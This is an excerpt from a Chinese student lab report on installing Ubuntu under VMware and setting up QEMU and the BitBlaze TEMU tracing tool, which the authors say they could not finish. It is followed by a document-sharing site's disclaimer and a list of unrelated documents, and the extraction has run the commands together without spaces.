4,在此基礎上,為安裝運行環(huán)境TEMU,我們應當安裝QEMU。具體步驟如下:(1)先安裝VMwareWorkstation7(2)安裝完后在VMwareWorkstation7中安裝UBUNTU系統(tǒng)步驟如下:1)文件——新建——虛擬機,選擇標準圖4-12)根據(jù)Ubuntu安裝方式選擇從安裝盤或鏡像文件安裝圖4-23)自定義UBUNTU用戶名稱,用戶名,密碼圖4-34)自定義虛擬機名稱和安裝位置(找一個較大的位置,為虛擬機預留可使用空間)圖4-4自定義虛擬機可用硬盤空間圖4-56)自定義虛擬機硬件配置(可根據(jù)電腦配置自行更改虛擬機硬件配置)圖4-6(3)啟動虛擬機從安裝UBUNTU系統(tǒng),配置好用戶名密碼后自動進行安裝圖4-7(4)進如UBUNTU系統(tǒng)之后按CTRL+ALT+F2進入控制臺輸入賬號密碼圖4-8鍵入cd~mkdirbitblazecdbitblaze 表4-1創(chuàng)建Bitblaze文件夾在確認聯(lián)網(wǎng)的前提下進行TEMU/QEMU的安裝,按照如下步驟輸入指令:(UBUNTU能自尋搜索并下載QEMU)sudoapt-getinstallqemusudoapt-getbuild-depqemusudoapt-getinstallkqemu-commonkqemu-sourcesudoapt-getinstallmodule-assistantsudomodule-assistant-tauto-installkqemusudoapt-getinstallbinutils-devsudoapt-getinstallgcc-3.4tarxvzf/tmp/temu-1.0.tar.gz(先將temu-1.0..tar.gz放在TMP文件夾中)表4-2在QMUE下安裝UBUNTU虛擬機(這一步由于未能找到對于在QEMU下安裝虛擬系統(tǒng)的步驟和指令, 而后面的應用和指令,都是在QEMU下安再安裝虛擬機UBUNTU,使用TEMU的追蹤功能進行查看示例在這兩個虛擬機之間進行的操作,因此由于這一步未能實現(xiàn),所以無法繼續(xù)進行以下步驟。)啟動TEMU追蹤功能(cdtemu-1.0&&./configure--target-list=i386-softmmu--proj-name=tracecap \--cc=gcc-3.4--prefix=‘pwd‘/install)(cdtemu-1.0&&make)(cdtemu-1.0&&makeinstall)表4-3配置TMUE網(wǎng)絡步驟如下:sudo/sbin/ifconfig$1sudoapt-getinstalluml-utilitiessudo/usr/sbin/tunctl-buser-ttap0sudochmod666/dev/net/tunqemu-kernel-kqemu-snapshot-netnic,vlan=0\-net tap,vlan=0,script=/etc/qemu-ifup\-monitorstdio/path/to/qemu/image表4-4:此步是本次試驗的分水嶺。事實上,我們并沒有完成此步的操作,具體問題會馬上在總結中討論。因而,以上步驟中最后的(5),(6)兩步我們沒有進
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經(jīng)權益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責。
- 6. 下載文件中如有侵權或不適當內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 2025年KTV特色主題活動策劃與執(zhí)行合同3篇
- 2025版攤鋪機租賃及施工質(zhì)量保障合同范本6篇
- 個人健身教練合同:2024版專業(yè)輔導合同書
- 2025年度臨時用工勞務合同編制指南范本2篇
- 二零二五年度光伏電站運維人工勞務合同范本3篇
- 2025年木材市場分析與預測合作合同范本
- 二零二五版木門行業(yè)展會參展與推廣服務合同4篇
- 二零二五年度數(shù)字貨幣技術研發(fā)與應用合同集2篇
- 2025年戶外健身路徑欄桿設施采購合同3篇
- 2025年度獵頭服務人才引進與培養(yǎng)合作協(xié)議5篇
- 《電影之創(chuàng)戰(zhàn)紀》課件
- 社區(qū)醫(yī)療抗菌藥物分級管理方案
- 開題報告-鑄牢中華民族共同體意識的學校教育研究
- 《醫(yī)院標識牌規(guī)劃設計方案》
- 公司2025年會暨員工團隊頒獎盛典攜手同行共創(chuàng)未來模板
- 夜市運營投標方案(技術方案)
- 電接點 水位計工作原理及故障處理
- 國家職業(yè)大典
- 2024版房產(chǎn)代持協(xié)議書樣本
- 公眾號運營實戰(zhàn)手冊
- 科研倫理與學術規(guī)范(研究生)期末試題庫及答案
評論
0/150
提交評論